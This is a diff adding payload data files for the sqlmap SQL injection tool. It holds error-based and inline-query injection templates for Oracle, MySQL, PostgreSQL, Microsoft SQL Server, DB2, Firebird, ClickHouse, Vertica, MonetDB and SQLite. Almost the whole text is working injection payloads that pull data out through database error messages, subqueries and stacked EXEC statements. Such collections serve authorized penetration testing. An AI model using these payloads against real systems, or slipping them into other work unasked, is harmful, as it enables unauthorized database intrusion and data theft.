+ + + Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS) + 2 + 2 + 1 + 1,9 + 1 + AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle + >= 8.1.6 +
+
+ + + Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS) + 2 + 2 + 3 + 1,9 + 2 + OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle + >= 8.1.6 +
+
+ + + Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) + 2 + 3 + 1 + 1,9 + 1 + AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ + + Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) + 2 + 3 + 3 + 1,9 + 2 + OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ + + Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH) + 2 + 4 + 1 + 1,9 + 1 + AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH(('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ + + Oracle OR error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH) + 2 + 4 + 3 + 1,9 + 2 + OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH(('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ + + Firebird AND error-based - WHERE or HAVING clause + 2 + 3 + 1 + 1 + 1 + AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Firebird +
+
+ + + Firebird OR error-based - WHERE or HAVING clause + 2 + 4 + 3 + 1 + 2 + OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Firebird +
+
+ + + MonetDB AND error-based - WHERE or HAVING clause + 2 + 3 + 1 + 1 + 1 + AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN CODE(49) ELSE CODE(48) END)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MonetDB +
+
+ + + MonetDB OR error-based - WHERE or HAVING clause + 2 + 4 + 3 + 1 + 2 + OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN CODE(49) ELSE CODE(48) END)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MonetDB +
+
+ + + Vertica AND error-based - WHERE or HAVING clause + 2 + 3 + 1 + 1 + 1 + AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC) + + AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN BITCOUNT(BITSTRING_TO_BINARY('1')) ELSE BITCOUNT(BITSTRING_TO_BINARY('0')) END))::varchar||'[DELIMITER_STOP]' AS NUMERIC) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Vertica +
+
+ + + Vertica OR error-based - WHERE or HAVING clause + 2 + 4 + 3 + 1 + 2 + OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC) + + OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN BITCOUNT(BITSTRING_TO_BINARY('1')) ELSE BITCOUNT(BITSTRING_TO_BINARY('0')) END))::varchar||'[DELIMITER_STOP]' AS NUMERIC) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Vertica +
+
+ + + IBM DB2 AND error-based - WHERE or HAVING clause + 2 + 3 + 1 + 1 + 1 + AND [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + AND [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ IBM DB2 +
+
+ + + IBM DB2 OR error-based - WHERE or HAVING clause + 2 + 4 + 3 + 1 + 1 + OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ IBM DB2 +
+
+ + + ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause + 2 + 3 + 1 + 1,2,3,9 + 1 + AND [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]') + + AND [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ ClickHouse +
+
+ + + ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause + 2 + 4 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]') + + OR [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ ClickHouse +
+
+ + + + + + + MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE) + 2 + 2 + 1 + 1,2,3,4,5 + 1 + PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')),1) + + PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')),1) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.1 +
+
+ + + + + MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED) + 2 + 5 + 1 + 1,2,3,9 + 3 + (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610))) + + + (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610))) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.5 +
+
+ + + MySQL >= 5.5 error-based - Parameter replace (EXP) + 2 + 5 + 1 + 1,2,3,9 + 3 + EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x)) + + EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x)) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.5 +
+
+ + + MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET) + 2 + 5 + 1 + 1,2,3,9 + 3 + GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM]) + + GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM]) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.6 +
+
+ + + MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS) + 2 + 5 + 1 + 1,2,3,9 + 3 + JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8))) + + JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8))) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.7.8 +
+
+ + + MySQL >= 5.0 error-based - Parameter replace (FLOOR) + 2 + 2 + 1 + 1,2,3,9 + 3 + (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + + (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.0 +
+
+ + + MySQL >= 5.1 error-based - Parameter replace (UPDATEXML) + 2 + 4 + 1 + 1,2,3,9 + 3 + (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])) + + + (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.1 +
+
+ + + MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE) + 2 + 2 + 1 + 1,2,3,9 + 3 + (EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))) + + + (EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.1 +
+
+ + + PostgreSQL error-based - Parameter replace + 2 + 2 + 1 + 1,2,3,9 + 3 + (CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)) + + (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ PostgreSQL +
+
+ + + PostgreSQL error-based - Parameter replace (GENERATE_SERIES) + 2 + 5 + 1 + 1,2,3,9 + 3 + (CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)) + + (CAST('[DELIMITER_START]'||(SELECT 1 FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)::text||'[DELIMITER_STOP]' AS NUMERIC)) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase error-based - Parameter replace + 2 + 3 + 1 + 1,3 + 3 + (CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))) + + (CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase error-based - Parameter replace (integer column) + 2 + 4 + 1 + 1,3 + 3 + (SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]') + + (SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Oracle error-based - Parameter replace + 2 + 3 + 1 + 1,3 + 3 + (SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + + (SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ + + Firebird error-based - Parameter replace + 2 + 4 + 1 + 1,3 + 3 + (SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')) + + (SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Firebird +
+
+ + + IBM DB2 error-based - Parameter replace + 2 + 4 + 1 + 1,3 + 3 + RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ IBM DB2 +
+
+ + + + + MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED) + 2 + 5 + 1 + 2,3 + 1 + ,(SELECT [RANDNUM] FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))x) + + ,(SELECT [RANDNUM] FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))x) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.5 +
+
+ + + MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP) + 2 + 5 + 1 + 2,3 + 1 + ,(SELECT [RANDNUM] FROM (SELECT EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x)))s) + + ,(SELECT [RANDNUM] FROM (SELECT EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x)))s) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.5 +
+
+ + + MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET) + 2 + 5 + 1 + 2,3 + 1 + ,GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM]) + + ,GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM]) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.6 +
+
+ + + MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS) + 2 + 5 + 1 + 2,3 + 1 + ,(SELECT [RANDNUM] FROM (SELECT JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8))))x) + + ,(SELECT [RANDNUM] FROM (SELECT JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8))))x) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.7.8 +
+
+ + + MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR) + 2 + 4 + 1 + 2,3 + 1 + ,(SELECT 1 FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + ,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.0 +
+
+ + + MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE) + 2 + 3 + 1 + 2,3 + 1 + ,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) + + ,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.1 +
+
+ + + MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML) + 2 + 5 + 1 + 2,3 + 1 + ,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]) + + ,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1]) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.1 +
+
+ + + MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR) + 2 + 3 + 1 + 2,3 + 1 + ,(SELECT [RANDNUM] FROM (SELECT ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x))s) + + ,(SELECT [RANDNUM] FROM (SELECT ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x))s) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 4.1 +
+
+ + + PostgreSQL error-based - ORDER BY, GROUP BY clause + 2 + 3 + 1 + 2,3 + 1 + ,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)) + + ,(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ PostgreSQL +
+
+ + + PostgreSQL error-based - ORDER BY, GROUP BY clause (GENERATE_SERIES) + 2 + 5 + 1 + 2,3 + 1 + ,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)) + + ,(CAST('[DELIMITER_START]'||(SELECT 1 FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)::text||'[DELIMITER_STOP]' AS NUMERIC)) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase error-based - ORDER BY clause + 2 + 4 + 1 + 3 + 1 + ,(SELECT [RANDNUM] WHERE [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))) + + ,(SELECT [RANDNUM] WHERE [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Oracle error-based - ORDER BY, GROUP BY clause + 2 + 4 + 1 + 2,3 + 1 + ,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + + ,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ + + Firebird error-based - ORDER BY clause + 2 + 5 + 1 + 3 + 1 + ,(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')) + + ,(SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Firebird +
+
+ + + IBM DB2 error-based - ORDER BY clause + 2 + 5 + 1 + 3 + 1 + ,RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + ,RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ IBM DB2 +
+
+ + + + + + Microsoft SQL Server/Sybase error-based - Stacking (EXEC) + 2 + 2 + 1 + 1-8 + 1 + ;DECLARE @[RANDSTR] NVARCHAR(4000);SET @[RANDSTR]=(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]');EXEC @[RANDSTR] + + ;DECLARE @[RANDSTR] NVARCHAR(4000);SET @[RANDSTR]=(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]');EXEC @[RANDSTR] + -- + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ +
diff --git a/src/sqlmap-master/data/xml/payloads/inline_query.xml b/src/sqlmap-master/data/xml/payloads/inline_query.xml new file mode 100644 index 0000000..7269be6 --- /dev/null +++ b/src/sqlmap-master/data/xml/payloads/inline_query.xml @@ -0,0 +1,157 @@ + + + + + + Generic inline queries + 3 + 1 + 1 + 1,2,3,8 + 3 + (SELECT CONCAT(CONCAT('[DELIMITER_START]',([QUERY])),'[DELIMITER_STOP]')) + + (SELECT CONCAT(CONCAT('[DELIMITER_START]',(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + + + + + MySQL inline queries + 3 + 2 + 1 + 1,2,3,8 + 3 + (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) + + (SELECT CONCAT('[DELIMITER_START]',(ELT([RANDNUM]=[RANDNUM],1)),'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL +
+
+ + + PostgreSQL inline queries + 3 + 2 + 1 + 1,2,3,8 + 3 + (SELECT '[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]') + + (SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase inline queries + 3 + 2 + 1 + 1,2,3,8 + 3 + (SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]') + + (SELECT '[DELIMITER_START]'+(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)+'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Oracle inline queries + 3 + 2 + 1 + 1,2,3,8 + 3 + (SELECT ('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') FROM DUAL) + + + (SELECT '[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN TO_NUMBER(1) ELSE TO_NUMBER(0) END)||'[DELIMITER_STOP]' FROM DUAL) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ + + SQLite inline queries + 3 + 3 + 1 + 1,2,3,8 + 3 + SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' + + SELECT '[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ SQLite +
+
